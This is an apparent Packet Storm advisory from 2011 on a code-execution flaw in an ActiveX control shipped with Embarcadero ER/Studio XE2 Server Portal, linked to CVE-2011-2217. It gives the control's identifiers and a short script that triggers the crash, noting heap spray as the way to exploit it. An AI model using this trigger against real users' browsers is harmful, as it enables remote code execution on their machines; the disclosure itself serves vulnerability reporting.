Lucene search

K
packetstormRgodPACKETSTORM:104882
HistorySep 08, 2011 - 12:00 a.m.

Embarcadero ER/Studio XE2 Server Portal Code Execution

2011-09-0800:00:00
rgod
packetstormsecurity.com
25

0.958 High

EPSS

Percentile

99.4%

`  
See: CVE-2011-2217  
reference url: http://www.securityfocus.com/bid/48099  
  
The mentioned product is vulnerable to the same issue.  
  
download url: https://downloads.embarcadero.com/free/er_studio_portal  
  
ActiveX settings:   
ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1  
CLSID: {658ED6E7-0DA1-4ADD-B2FB-095F08091118}  
Binary path: D:\Program Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll  
Safe for scripting (registry): true  
Safe for initialize (registry): true  
  
poc:  
  
<script>  
var obj = new ActiveXObject("TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1");  
</script>  
  
then the dll will try to call inside an unitialized memory region  
which is reachable by an attacker through heap spray.  
  
//rgod  
`